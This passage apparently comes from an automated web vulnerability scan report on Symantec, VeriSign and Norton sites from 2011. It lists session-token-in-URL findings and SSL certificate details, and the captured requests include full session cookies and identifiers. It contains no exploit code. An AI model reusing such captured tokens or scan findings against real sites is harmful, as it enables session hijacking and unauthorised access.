Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Length: 60
Content-Type: image/gif
Last-Modified: Thu, 18 Mar 2010 01:42:30 GMT
Accept-Ranges: bytes

GIF89a    .    .....G....!.......,....    .    ......g.....O...U...-G..;

7.10. http://sales.liveperson.net/hc/2735064/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /hc/2735064/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064
Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064
Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...

7.11. https://securitycenter.verisign.com/celp/enroll/retail

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/retail

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:17 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

7.12. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://symantec.tt.omtrdc.net
Path:   /m2/symantec/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/symantec/mbox/standard?mboxHost=us.norton.com&mboxSession=1315621887128-280442&mboxPage=1315621887128-280442&screenHeight=1200&screenWidth=1920&browserWidth=1147&browserHeight=957&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=norton_lp_redirect&mboxId=0&mboxTime=1315603887688&mboxURL=http%3A%2F%2Fus.norton.com%2Findex.jsp&mboxReferrer=http%3A%2F%2Fwww.symantec.com%2Fbusiness%2Fverisign%2Ffraud-detection-service%3Ftid%3Dgnps&mboxVersion=39 HTTP/1.1
Host: symantec.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://us.norton.com/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 1591
Date: Fri, 09 Sep 2011 21:30:58 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('norton_lp_redirect',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-defau
...[SNIP]...

7.13. https://trust-center.verisign.com/process/retail/trust_product_selector

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://trust-center.verisign.com
Path:   /process/retail/trust_product_selector

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:32 GMT
Server: Apache
Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 41019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">

...[SNIP]...

7.14. http://vipmobile.verisign.com/images/favicon.ico

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://vipmobile.verisign.com
Path:   /images/favicon.ico

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/favicon.ico;jsessionid=2D09D7FD63CC5CC2C8FC4F5A841ADA15.tomcat2 HTTP/1.1
Host: vipmobile.verisign.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474; IS3_GSV=DPL-2_TES-1315621562_PCT-1315623642_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315623643.2; __utmb=136906671.1.10.1315623643; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315510044-5-99_0-1-__0_; __fds_fp_id__=44590564957.2; JSESSIONID=39BCE0979E896FBFC247F406B455ECFD.tomcat2

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 22:04:01 GMT
Server: Apache
Location: http://vipmobile.verisign.com/images/favicon.ico
Content-Length: 328
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://vipmobile.verisi
...[SNIP]...

7.15. https://vipmobile.verisign.com/home.v

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://vipmobile.verisign.com
Path:   /home.v

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /home.v;jsessionid=5B879E00A090344FCA461344644F595F.tomcat1 HTTP/1.1
Host: vipmobile.verisign.com
Connection: keep-alive
Referer: https://idprotect.verisign.com/orderstart.v
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.11.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; JSESSIONID=5B879E00A090344FCA461344644F595F.tomcat1

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:52:05 GMT
Server: Apache
Location: https://vipmobile.verisign.com/home.v
Content-Length: 318
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="https://vipmobile.veris
...[SNIP]...

8. SSL certificate
There are 37 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



8.1. https://fileconnect.symantec.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://fileconnect.symantec.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  FILECONNECT.SYMANTEC.COM
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:  Sat Jul 07 17:59:59 GMT-06:00 2012

8.2. https://forms.verisign.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://forms.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  forms.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun May 29 18:00:00 GMT-06:00 2011
Valid to:  Wed May 29 17:59:59 GMT-06:00 2013

8.3. https://knowledge.verisign.ch/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://knowledge.verisign.ch
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  vrsn-intl.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Jun 08 18:00:00 GMT-06:00 2010
Valid to:  Fri Jun 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.4. https://knowledge.verisign.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://knowledge.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  knowledge.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Feb 02 18:00:00 GMT-06:00 2010
Valid to:  Mon Feb 20 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.5. https://onlinefamily.norton.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://onlinefamily.norton.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.onlinefamily.norton.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Tue Oct 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Oct 06 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.6. https://query.verisign.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://query.verisign.com
Path:   /

Issue detail

The following problems were identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  query-ncsa.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Feb 13 18:00:00 GMT-06:00 2011
Valid to:  Tue Mar 05 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #2

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Wed Jul 16 17:59:59 GMT-06:00 2036

8.7. https://ssl-certificate-center.verisign.ch/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-emea.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.8. https://ssl-certificate-center.verisign.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-ncsa.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.9. https://trust-center.verisign.ch/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-emea.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.10. https://trust-center.verisign.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  ssl-certificate-center-ncsa.verisign.net
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 05 18:00:00 GMT-06:00 2010
Valid to:  Thu Jul 05 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.11. https://us.norton.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://us.norton.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.norton.com
Issued by:  USERTrust Legacy Secure Server CA
Valid from:  Thu Jul 07 18:00:00 GMT-06:00 2011
Valid to:  Sat May 19 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  USERTrust Legacy Secure Server CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Thu Nov 26 14:33:13 GMT-06:00 2009
Valid to:  Sat Oct 31 22:00:00 GMT-06:00 2015

Certificate chain #2

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 10:09:40 GMT-06:00 1999
Valid to:  Sat May 25 10:39:40 GMT-06:00 2019

8.12. https://admin.instantservice.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.instantservice.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.instantservice.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Jul 06 18:00:00 GMT-06:00 2011
Valid to:  Fri Jul 06 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.13. https://buy-static.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy-static.norton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  buy-static.norton.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jul 11 18:00:00 GMT-06:00 2011
Valid to:  Sat Jul 28 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.14. https://cdn.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cdn.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  cdn.verisign.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Sun Apr 18 18:00:00 GMT-06:00 2010
Valid to:  Fri Apr 18 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

